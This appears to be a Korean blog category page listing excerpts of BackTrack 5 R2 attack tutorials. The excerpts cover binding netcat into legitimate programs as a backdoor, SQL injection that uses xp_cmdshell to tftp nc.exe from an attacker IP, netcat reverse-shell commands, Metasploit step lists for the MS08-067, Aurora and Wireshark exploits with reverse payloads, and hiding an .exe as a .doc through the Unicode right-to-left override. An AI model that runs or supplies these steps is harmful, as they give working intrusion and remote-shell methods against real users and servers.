it/network

it/network

[BT5R2] 정상파일에 exploit 삽입하여 백도어(Back door) 감염시키기

이 공격은 NetCat 리버스 커넥션에서 한단계 업그레이드된 방법으로써소셜해킹 , 인간관계적인 해킹을 사용하는 방법입니다. 정상적이고 실행하고싶거나 실행해야하는 프로그램에 공격자의 nc.exe를 병합하여 반강제적으로 NetCat 공격을 감행하는것입니다. 이 공격에 감염되었던 사례가 네이트온과 농협 해킹사건입니다. 이 과정에는 두가지 프로그램이 필요합니다. nc.exe( netcat 프로그램 ) 과 파일병합 프로그램 PowermergerNetCat UNIX/LINUX 용 : http://netcat.sourceforge.net/download.phpWindows 용 : http://www.securityfocus.com/tools/139Powermergerhttp://hsol.tistory.com/664 ..

it/network

[BT5R2] 웹 취약점을 이용한 리버스 커넥션

웹 취약점을 이용하여 리버스 커넥션 수행 및 점령1) 서버 컴퓨터의 정보 SQL Injection - OS: windows2000 - DBMS: MS-SQL - 확장프로시저:XP_CMDSHELL 2) NC 업로드(tftp이용)- 'exec master.dbo.xp_cmdshell 'tftp -i 공격자ip get nc.exe 대상디렉토리\파일.exe' -- ex)'exec master.dbo.xp_cmdshell 'tftp -i 163.152.110.135 get nc.exe c:\test\test.exe' -- 3) 공격자 PC 대기상태 돌입nc -lvp 임의의portex) nc -lvp 7777 4) 피해자 웹서버가 공격자에게 리버스 커넥션 수행'exec master.dbo.xp_cmdshell 'c..

it/network

[BT5R2] wireshark 취약점 공격

BT5R2 - root - toor - startx - msfconsole [wireshark 취약점] 1. msfconsole 2. search wireshark 3. use multi/misc/wireshark_lwres_getaddrbyname 4. show options 5. set rhost 타겟IP ex) set rhost 192.168.198.128 6. show targets 7. set target 4 8. show payloads 9. set payload windows/vncinject/reverse_tcp 10. set lhost 공격자IP ex) set lhost 192.168.198.142 11. set lport 5555

it/network

[BT5R2] MS10_002_aurora 공격

BT5R2 - root - toor - startx - msfconsole [MS10_002_aurora] #XP(피해자PC) - 시작 -> 실행 -> lusrmgr.msc - 사용자 -> administrator -> 암호설정 1) search browser 2) use windows/browser/ms10_002_aurora 3) show options 4) set srvport 80 5) set uripath test.html 6) show payloads 7) set payload windows/meterpreter/reverse_tcp 8) show options 9) set lhost 공격자ip(ifconfig -> eth1 -> inetaddr) ex) set lhost 192.168.198..

it/network

[BT5R2] MS08-067 Netapi 공격

BT5R2 - root - toor - startx - msfconsole [MS08-067 Netapi 공격] 1) search 067 2) use windows/smb/ms08_067_netapi 3) show options 4) set rhost 192.168.198.128 5) show payloads 6) set payload windows/shell/bind_tcp 7) show options 8) exploit * CTRL + Z: 유지 * CTRL + C: Abort * sessions -l sessions -i (id)

it/network

NetCat을 이용한 리버스 커넥션

1. 공격자PC - cmd - nc.exe 가 위치한 경로로 이동 - nc -lvp 임의의 port ex)nc -lvp 5555 - 리스닝 모드(대기상태) 돌입 2. 피해자 PC - CMD - nc.exe 가 위치한 경로로 이동 - nc 공격자IP port번호 -e cmd

it/network

exe파일을 다른파일로 위장하기

1. 폴더 보기 옵션에서 '알려진 확장자명 숨기기' 체크 해제 2. 새로 만들기 logcod.exe 파일 생성( [파일명]cod.exe 면 된다. ) 3. 제어판 -> 국가 및 언어 옵션 -> "언어 탭" -> "자세히" -> 추가 -> 입력언어: 중국어(대만) / 자판배열: 중국어(번체-Unicode) 선택 후 확인 4. 작업표시줄 하단에 언어를 중국어(대만)로 선택 5. log 와 cod 사이에 202e 입력(유니코드) ex)log202ecod.exe 성공했다면 exe파일이지만 확장자가 doc로 바뀐것을 볼 수 있다.

반응형
훈솔
'it/network' 카테고리의 글 목록